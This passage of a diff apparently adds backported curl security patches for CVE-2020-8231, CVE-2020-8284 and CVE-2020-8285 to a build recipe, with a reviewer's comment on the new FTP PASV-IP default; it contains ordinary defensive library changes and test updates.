++ DEBUGASSERT(conn);
+ infof(conn->data, "Closing connection %ld\n", conn->connection_id);
+ DEBUGASSERT(conn->data);
+
+@@ -702,16 +700,11 @@ static void conn_shutdown(struct connectdata *conn)
+ Curl_closesocket(conn, conn->tempsock[0]);
+ if(CURL_SOCKET_BAD != conn->tempsock[1])
+ Curl_closesocket(conn, conn->tempsock[1]);
+-
+- /* unlink ourselves. this should be called last since other shutdown
+- procedures need a valid conn->data and this may clear it. */
+- Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ }
+
+ static void conn_free(struct connectdata *conn)
+ {
+- if(!conn)
+- return;
++ DEBUGASSERT(conn);
+
+ Curl_free_idnconverted_hostname(&conn->host);
+ Curl_free_idnconverted_hostname(&conn->conn_to_host);
+@@ -778,13 +771,17 @@ static void conn_free(struct connectdata *conn)
+ CURLcode Curl_disconnect(struct Curl_easy *data,
+ struct connectdata *conn, bool dead_connection)
+ {
+- if(!conn)
+- return CURLE_OK; /* this is closed and fine already */
++ /* there must be a connection to close */
++ DEBUGASSERT(conn);
+
+- if(!data) {
+- DEBUGF(infof(data, "DISCONNECT without easy handle, ignoring\n"));
+- return CURLE_OK;
+- }
++ /* it must be removed from the connection cache */
++ DEBUGASSERT(!conn->bundle);
++
++ /* there must be an associated transfer */
++ DEBUGASSERT(data);
++
++ /* the transfer must be detached from the connection */
++ DEBUGASSERT(!data->conn);
+
+ /*
+ * If this connection isn't marked to force-close, leave it open if there
+@@ -800,16 +797,11 @@ CURLcode Curl_disconnect(struct Curl_easy *data,
+ conn->dns_entry = NULL;
+ }
+
+- Curl_hostcache_prune(data); /* kill old DNS cache entries */
+-
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_NTLM)
+ /* Cleanup NTLM connection-related data */
+ Curl_http_auth_cleanup_ntlm(conn);
+-#endif
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_SPNEGO)
++
+ /* Cleanup NEGOTIATE connection-related data */
+ Curl_http_auth_cleanup_negotiate(conn);
+-#endif
+
+ /* the protocol specific disconnect handler and conn_shutdown need a transfer
+ for the connection! */
+@@ -1006,8 +998,12 @@ static int call_extract_if_dead(struct connectdata *conn, void *param)
+ static void prune_dead_connections(struct Curl_easy *data)
+ {
+ struct curltime now = Curl_now();
+- timediff_t elapsed =
++ timediff_t elapsed;
++
++ CONNCACHE_LOCK(data);
++ elapsed =
+ Curl_timediff(now, data->state.conn_cache->last_cleanup);
++ CONNCACHE_UNLOCK(data);
+
+ if(elapsed >= 1000L) {
+ struct prunedead prune;
+@@ -1015,10 +1011,17 @@ static void prune_dead_connections(struct Curl_easy *data)
+ prune.extracted = NULL;
+ while(Curl_conncache_foreach(data, data->state.conn_cache, &prune,
+ call_extract_if_dead)) {
++ /* unlocked */
++
++ /* remove connection from cache */
++ Curl_conncache_remove_conn(data, prune.extracted, TRUE);
++
+ /* disconnect it */
+ (void)Curl_disconnect(data, prune.extracted, /* dead_connection */TRUE);
+ }
++ CONNCACHE_LOCK(data);
+ data->state.conn_cache->last_cleanup = now;
++ CONNCACHE_UNLOCK(data);
+ }
+ }
+
+@@ -1078,7 +1081,7 @@ ConnectionExists(struct Curl_easy *data,
+ if(data->set.pipewait) {
+ infof(data, "Server doesn't support multiplex yet, wait\n");
+ *waitpipe = TRUE;
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+ return FALSE; /* no re-use */
+ }
+
+@@ -1402,11 +1405,12 @@ ConnectionExists(struct Curl_easy *data,
+ if(chosen) {
+ /* mark it as used before releasing the lock */
+ chosen->data = data; /* own it! */
+- Curl_conncache_unlock(data);
++ Curl_attach_connnection(data, chosen);
++ CONNCACHE_UNLOCK(data);
+ *usethis = chosen;
+ return TRUE; /* yes, we found one to use! */
+ }
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ if(foundPendingCandidate && data->set.pipewait) {
+ infof(data,
+@@ -3519,6 +3523,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ if(!result) {
+ conn->bits.tcpconnect[FIRSTSOCKET] = TRUE; /* we are "connected */
+
++ Curl_attach_connnection(data, conn);
+ result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+ if(result)
+ goto out;
+@@ -3533,7 +3538,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+ (void)conn->handler->done(conn, result, FALSE);
+ goto out;
+ }
+- Curl_attach_connnection(data, conn);
+ Curl_setup_transfer(data, -1, -1, FALSE, -1);
+ }
+
+@@ -3683,7 +3687,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ /* The bundle is full. Extract the oldest connection. */
+ conn_candidate = Curl_conncache_extract_bundle(data, bundle);
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ if(conn_candidate)
+ (void)Curl_disconnect(data, conn_candidate,
+@@ -3695,7 +3699,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ }
+ }
+ else
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ }
+
+@@ -3729,6 +3733,8 @@ static CURLcode create_conn(struct Curl_easy *data,
+ * This is a brand new connection, so let's store it in the connection
+ * cache of ours!
+ */
++ Curl_attach_connnection(data, conn);
++
+ result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+ if(result)
+ goto out;
+@@ -3883,7 +3889,7 @@ CURLcode Curl_connect(struct Curl_easy *data,
+ result = create_conn(data, &conn, asyncp);
+
+ if(!result) {
+- if(CONN_INUSE(conn))
++ if(CONN_INUSE(conn) > 1)
+ /* multiplexed */
+ *protocol_done = TRUE;
+ else if(!*asyncp) {
+@@ -3900,11 +3906,10 @@ CURLcode Curl_connect(struct Curl_easy *data,
+ else if(result && conn) {
+ /* We're not allowed to return failure with memory left allocated in the
+ connectdata struct, free those here */
++ Curl_detach_connnection(data);
++ Curl_conncache_remove_conn(data, conn, TRUE);
+ Curl_disconnect(data, conn, TRUE);
+ }
+- else if(!result && !data->conn)
+- /* FILE: transfers already have the connection attached */
+- Curl_attach_connnection(data, conn);
+
+ return result;
+ }
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index 06f1897..d3926d9 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -29,6 +29,12 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -40,6 +46,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -51,6 +61,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+diff --git a/tests/unit/unit1620.c b/tests/unit/unit1620.c
+index 6e572c6..b23e5b9 100644
+--- a/tests/unit/unit1620.c
++++ b/tests/unit/unit1620.c
+@@ -5,7 +5,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -73,10 +73,6 @@ UNITTEST_START
+ fail_unless(rc == CURLE_OK,
+ "Curl_parse_login_details() failed");
+
+- rc = Curl_disconnect(empty, empty->conn, FALSE);
+- fail_unless(rc == CURLE_OK,
+- "Curl_disconnect() with dead_connection set FALSE failed");
+-
+ Curl_freeset(empty);
+ for(i = (enum dupstring)0; i < STRING_LAST; i++) {
+ fail_unless(empty->set.str[i] == NULL,
+--
+2.25.4
+
+
+From 6830828c9eecd9ab14404f2f49f19b56dec62130 Mon Sep 17 00:00:00 2001
+From: Marc Aldorasi <marc@groundctl.com>
+Date: Thu, 30 Jul 2020 14:16:17 -0400
+Subject: [PATCH 2/3] multi_remove_handle: close unused connect-only
+ connections
+
+Previously any connect-only connections in a multi handle would be kept
+alive until the multi handle was closed. Since these connections cannot
+be re-used, they can be marked for closure when the associated easy
+handle is removed from the multi handle.
+
+Closes #5749
+
+Upstream-commit: d5bb459ccf1fc5980ae4b95c05b4ecf6454a7599
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/multi.c | 34 ++++++++++++++++++++++++++++++----
+ tests/data/test1554 | 6 ++++++
+ 2 files changed, 36 insertions(+), 4 deletions(-)
+
+diff --git a/lib/multi.c b/lib/multi.c
+index 249e360..f1371bd 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -682,6 +682,26 @@ static CURLcode multi_done(struct Curl_easy *data,
+ return result;
+ }
+
++static int close_connect_only(struct connectdata *conn, void *param)
++{
++ struct Curl_easy *data = param;
++
++ if(data->state.lastconnect != conn)
++ return 0;
++
++ if(conn->data != data)
++ return 1;
++ conn->data = NULL;
++
++ if(!conn->bits.connect_only)
++ return 1;
++
++ connclose(conn, "Removing connect-only easy handle");
++ conn->bits.connect_only = FALSE;
++
++ return 1;
++}
++
+ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ struct Curl_easy *data)
+ {
+@@ -765,10 +785,6 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ multi_done() as that may actually call Curl_expire that uses this */
+ Curl_llist_destroy(&data->state.timeoutlist, NULL);
+
+- /* as this was using a shared connection cache we clear the pointer to that
+- since we're not part of that multi handle anymore */
+- data->state.conn_cache = NULL;
+-
+ /* change state without using multistate(), only to make singlesocket() do
+ what we want */
+ data->mstate = CURLM_STATE_COMPLETED;
+@@ -778,12 +794,22 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ /* Remove the association between the connection and the handle */
+ Curl_detach_connnection(data);
+
++ if(data->state.lastconnect) {
++ /* Mark any connect-only connection for closure */
++ Curl_conncache_foreach(data, data->state.conn_cache,
++ data, &close_connect_only);
++ }
++
+ #ifdef USE_LIBPSL
+ /* Remove the PSL association. */
+ if(data->psl == &multi->psl)
+ data->psl = NULL;
+ #endif
+
++ /* as this was using a shared connection cache we clear the pointer to that
++ since we're not part of that multi handle anymore */
++ data->state.conn_cache = NULL;
++
+ data->multi = NULL; /* clear the association to this multi handle */
+
+ /* make sure there's no pending message in the queue sent from this easy
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index d3926d9..fffa6ad 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -50,6 +50,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -65,6 +67,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -74,6 +78,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ </datacheck>
+ </reply>
+
+--
+2.25.4
+
+
+From 01148ee40dd913a169435b0f9ea90e6393821e70 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sun, 16 Aug 2020 11:34:35 +0200
+Subject: [PATCH 3/3] Curl_easy: remember last connection by id, not by pointer
+
+CVE-2020-8231
+
+Bug: https://curl.haxx.se/docs/CVE-2020-8231.html
+
+Reported-by: Marc Aldorasi
+Closes #5824
+
+Upstream-commit: 3c9e021f86872baae412a427e807fbfa2f3e8a22
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/connect.c | 19 ++++++++++---------
+ lib/easy.c | 3 +--
+ lib/multi.c | 9 +++++----
+ lib/url.c | 2 +-
+ lib/urldata.h | 2 +-
+ 5 files changed, 18 insertions(+), 17 deletions(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index 29293f0..e1c5662 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -1356,15 +1356,15 @@ CURLcode Curl_connecthost(struct connectdata *conn, /* context */
+ }
+
+ struct connfind {
+- struct connectdata *tofind;
+- bool found;
++ long id_tofind;
++ struct connectdata *found;
+ };
+
+ static int conn_is_conn(struct connectdata *conn, void *param)
+ {
+ struct connfind *f = (struct connfind *)param;
+- if(conn == f->tofind) {
+- f->found = TRUE;
++ if(conn->connection_id == f->id_tofind) {
++ f->found = conn;
+ return 1;
+ }
+ return 0;
+@@ -1386,21 +1386,22 @@ curl_socket_t Curl_getconnectinfo(struct Curl_easy *data,
+ * - that is associated with a multi handle, and whose connection
+ * was detached with CURLOPT_CONNECT_ONLY
+ */
+- if(data->state.lastconnect && (data->multi_easy || data->multi)) {
+- struct connectdata *c = data->state.lastconnect;
++ if((data->state.lastconnect_id != -1) && (data->multi_easy || data->multi)) {
++ struct connectdata *c;
+ struct connfind find;
+- find.tofind = data->state.lastconnect;
+- find.found = FALSE;
++ find.id_tofind = data->state.lastconnect_id;
++ find.found = NULL;
+
+ Curl_conncache_foreach(data, data->multi_easy?
+ &data->multi_easy->conn_cache:
+ &data->multi->conn_cache, &find, conn_is_conn);
+
+ if(!find.found) {
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+ return CURL_SOCKET_BAD;
+ }
+
++ c = find.found;
+ if(connp) {
+ /* only store this if the caller cares for it */
+ *connp = c;
+diff --git a/lib/easy.c b/lib/easy.c
+index 292cca7..a69eb9e 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -831,8 +831,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+
+ /* the connection cache is setup on demand */
+ outcurl->state.conn_cache = NULL;
+-
+- outcurl->state.lastconnect = NULL;
++ outcurl->state.lastconnect_id = -1;
+
+ outcurl->progress.flags = data->progress.flags;
+ outcurl->progress.callback = data->progress.callback;
+diff --git a/lib/multi.c b/lib/multi.c
+index f1371bd..778c537 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -453,6 +453,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ data->state.conn_cache = &data->share->conn_cache;
+ else
+ data->state.conn_cache = &multi->conn_cache;
++ data->state.lastconnect_id = -1;
+
+ #ifdef USE_LIBPSL
+ /* Do the same for PSL. */
+@@ -671,11 +672,11 @@ static CURLcode multi_done(struct Curl_easy *data,
+ CONNCACHE_UNLOCK(data);
+ if(Curl_conncache_return_conn(data, conn)) {
+ /* remember the most recently used connection */
+- data->state.lastconnect = conn;
++ data->state.lastconnect_id = conn->connection_id;
+ infof(data, "%s\n", buffer);
+ }
+ else
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+ }
+
+ Curl_free_request_state(data);
+@@ -686,7 +687,7 @@ static int close_connect_only(struct connectdata *conn, void *param)
+ {
+ struct Curl_easy *data = param;
+
+- if(data->state.lastconnect != conn)
++ if(data->state.lastconnect_id != conn->connection_id)
+ return 0;
+
+ if(conn->data != data)
+@@ -794,7 +795,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ /* Remove the association between the connection and the handle */
+ Curl_detach_connnection(data);
+
+- if(data->state.lastconnect) {
++ if(data->state.lastconnect_id != -1) {
+ /* Mark any connect-only connection for closure */
+ Curl_conncache_foreach(data, data->state.conn_cache,
+ data, &close_connect_only);
+diff --git a/lib/url.c b/lib/url.c
+index a1a6b69..2919a3d 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -617,7 +617,7 @@ CURLcode Curl_open(struct Curl_easy **curl)
+ Curl_initinfo(data);
+
+ /* most recent connection is not yet defined */
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+
+ data->progress.flags |= PGRS_HIDE;
+ data->state.current_speed = -1; /* init to negative == impossible */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index f80a02d..6d8eb69 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1332,7 +1332,7 @@ struct UrlState {
+ /* buffers to store authentication data in, as parsed from input options */
+ struct curltime keeps_speed; /* for the progress meter really */
+
+- struct connectdata *lastconnect; /* The last connection, NULL if undefined */
++ long lastconnect_id; /* The last connection, -1 if undefined */
+
+ char *headerbuff; /* allocated buffer to store headers in */
+ size_t headersize; /* size of the allocation */
+--
+2.25.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8284.patch b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
new file mode 100644
index 0000000000..ed6e8049a6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
@@ -0,0 +1,209 @@
+From ec9cc725d598ac77de7b6df8afeec292b3c8ad46 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 24 Nov 2020 14:56:57 +0100
+Subject: [PATCH] ftp: CURLOPT_FTP_SKIP_PASV_IP by default
+
+The command line tool also independently sets --ftp-skip-pasv-ip by
+default.
+
+Ten test cases updated to adapt the modified --libcurl output.
+
+Bug: https://curl.se/docs/CVE-2020-8284.html
+CVE-2020-8284
+
+Reported-by: Varnavas Papaioannou
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/ec9cc725d598ac]
+CVE: CVE-2020-8284
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ docs/cmdline-opts/ftp-skip-pasv-ip.d | 2 ++
+ docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 | 8 +++++---
+ lib/url.c | 1 +
+ src/tool_cfgable.c | 1 +
+ tests/data/test1400 | 1 +
+ tests/data/test1401 | 1 +
+ tests/data/test1402 | 1 +
+ tests/data/test1403 | 1 +
+ tests/data/test1404 | 1 +
+ tests/data/test1405 | 1 +
+ tests/data/test1406 | 1 +
+ tests/data/test1407 | 1 +
+ tests/data/test1420 | 1 +
+ 14 files changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/docs/cmdline-opts/ftp-skip-pasv-ip.d b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+index d6fd4589b1e..bcf4e7e62f2 100644
+--- a/docs/cmdline-opts/ftp-skip-pasv-ip.d
++++ b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+@@ -10,4 +10,6 @@ to curl's PASV command when curl connects the data connection. Instead curl
+ will re-use the same IP address it already uses for the control
+ connection.
+
++Since curl 7.74.0 this option is enabled by default.
++
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+diff --git a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+index d6217d0d8ca..fa87ddce769 100644
+--- a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
++++ b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+@@ -5,7 +5,7 @@
+ .\" * | (__| |_| | _ <| |___
+ .\" * \___|\___/|_| \_\_____|
+ .\" *
+-.\" * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
++.\" * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ .\" *
+ .\" * This software is licensed as described in the file COPYING, which
+ .\" * you should have received as part of this distribution. The terms
+@@ -35,11 +35,13 @@ address it already uses for the control connection. But it will use the port
+ number from the 227-response.
+
+ This option thus allows libcurl to work around broken server installations
+-that due to NATs, firewalls or incompetence report the wrong IP address back.
++that due to NATs, firewalls or incompetence report the wrong IP address
++back. Setting the option also reduces the risk for various sorts of client
++abuse by malicious servers.
+
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+ .SH DEFAULT
+-0
++1 since 7.74.0, was 0 before then.
+ .SH PROTOCOLS
+ FTP
+ .SH EXAMPLE
+diff --git a/lib/url.c b/lib/url.c
+index f8b2a0030de..2b0ba87ba87 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -497,6 +497,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+ set->ftp_use_eprt = TRUE; /* FTP defaults to EPRT operations */
+ set->ftp_use_pret = FALSE; /* mainly useful for drftpd servers */
+ set->ftp_filemethod = FTPFILE_MULTICWD;
++ set->ftp_skip_ip = TRUE; /* skip PASV IP by default */
+ #endif
+ set->dns_cache_timeout = 60; /* Timeout every 60 seconds by default */
+
+diff --git a/src/tool_cfgable.c b/src/tool_cfgable.c
+index c52d8e1c6bb..4c06d3557b7 100644
+--- a/src/tool_cfgable.c
++++ b/src/tool_cfgable.c
+@@ -44,6 +44,7 @@ void config_init(struct OperationConfig *config)
+ config->tcp_nodelay = TRUE; /* enabled by default */
+ config->happy_eyeballs_timeout_ms = CURL_HET_DEFAULT;
+ config->http09_allowed = FALSE;
++ config->ftp_skip_ip = TRUE;
+ }
+
+ static void free_config_fields(struct OperationConfig *config)
+diff --git a/tests/data/test1400 b/tests/data/test1400
+index 812ad0b88d9..b7060eca58e 100644
+--- a/tests/data/test1400
++++ b/tests/data/test1400
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1401 b/tests/data/test1401
+index f93b3d637de..a2629683aff 100644
+--- a/tests/data/test1401
++++ b/tests/data/test1401
+@@ -87,6 +87,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_COOKIE, "chocolate=chip");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ curl_easy_setopt(hnd, CURLOPT_PROTOCOLS, (long)CURLPROTO_FILE |
+ (long)CURLPROTO_FTP |
+diff --git a/tests/data/test1402 b/tests/data/test1402
+index 7593c516da1..1bd55cb4e3b 100644
+--- a/tests/data/test1402
++++ b/tests/data/test1402
+@@ -78,6 +78,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1403 b/tests/data/test1403
+index ecb4dd3dcab..a7c9fcca322 100644
+--- a/tests/data/test1403
++++ b/tests/data/test1403
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1404 b/tests/data/test1404
+index 97622b63948..1d8e8cf7779 100644
+--- a/tests/data/test1404
++++ b/tests/data/test1404
+@@ -147,6 +147,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1405 b/tests/data/test1405
+index 2bac79eda74..b4087704f7b 100644
+--- a/tests/data/test1405
++++ b/tests/data/test1405
+@@ -89,6 +89,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_POSTQUOTE, slist2);
+ curl_easy_setopt(hnd, CURLOPT_PREQUOTE, slist3);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1406 b/tests/data/test1406
+index 51a166adff2..38f68d11ee1 100644
+--- a/tests/data/test1406
++++ b/tests/data/test1406
+@@ -79,6 +79,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_URL, "smtp://%HOSTIP:%SMTPPORT/1406");
+ curl_easy_setopt(hnd, CURLOPT_UPLOAD, 1L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ curl_easy_setopt(hnd, CURLOPT_MAIL_FROM, "sender@example.com");
+ curl_easy_setopt(hnd, CURLOPT_MAIL_RCPT, slist1);
+diff --git a/tests/data/test1407 b/tests/data/test1407
+index f6879008fb2..a7e13ba7585 100644
+--- a/tests/data/test1407
++++ b/tests/data/test1407
+@@ -62,6 +62,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_DIRLISTONLY, 1L);
+ curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1420 b/tests/data/test1420
+index 057ecc4773a..4b8d7bbf418 100644
+--- a/tests/data/test1420
++++ b/tests/data/test1420
+@@ -67,6 +67,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_URL, "imap://%HOSTIP:%IMAPPORT/1420/;MAILINDEX=1");
+ curl_easy_setopt(hnd, CURLOPT_USERPWD, "user:secret");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+
+
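Review bot: The documentation carried in this backport describes the new default by upstream release number (`Since curl 7.74.0 this option is enabled by default.` in ftp-skip-pasv-ip.d and `1 since 7.74.0, was 0 before then.` in CURLOPT_FTP_SKIP_PASV_IP.3), which will be wrong in the shipped man pages if the recipe's curl is older than 7.74.0; the recipe version is not visible here. The flip itself (`set->ftp_skip_ip = TRUE;` in `Curl_init_userdefined` and `config->ftp_skip_ip = TRUE;` in `config_init`) is a behaviour change on a stable branch. FTP servers that legitimately return a different data address in the 227 reply will now fail unless the application sets `CURLOPT_FTP_SKIP_PASV_IP` to `0L` or the user passes `--no-ftp-skip-pasv-ip`. I would record both points in the patch header, for example `Note: backported to curl <RECIPE_VERSION>; PASV IP is now ignored by default, opt out with CURLOPT_FTP_SKIP_PASV_IP=0`.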
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8285.patch b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
new file mode 100644
index 0000000000..a66729b180
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8285.patch
@@ -0,0 +1,260 @@
+From 6fda045b19a9066701b5e09cfa657a13a3accbf3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sat, 28 Nov 2020 00:27:21 +0100
+Subject: [PATCH] ftp: make wc_statemach loop instead of recurse
+
+CVE-2020-8285
+
+Fixes #6255
+Bug: https://curl.se/docs/CVE-2020-8285.html
+Reported-by: xnynx on github
+
+Upstream-commit: 69a358f2186e04cf44698b5100332cbf1ee7f01d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0006-curl-7.69.1-CVE-2020-8285.patch]
+CVE: CVE-2020-8285
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ftp.c | 202 +++++++++++++++++++++++++++---------------------------
+ 1 file changed, 102 insertions(+), 100 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 57b22ad..3382772 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -3763,129 +3763,131 @@ static CURLcode init_wc_data(struct connectdata *conn)
+ return result;
+ }
+
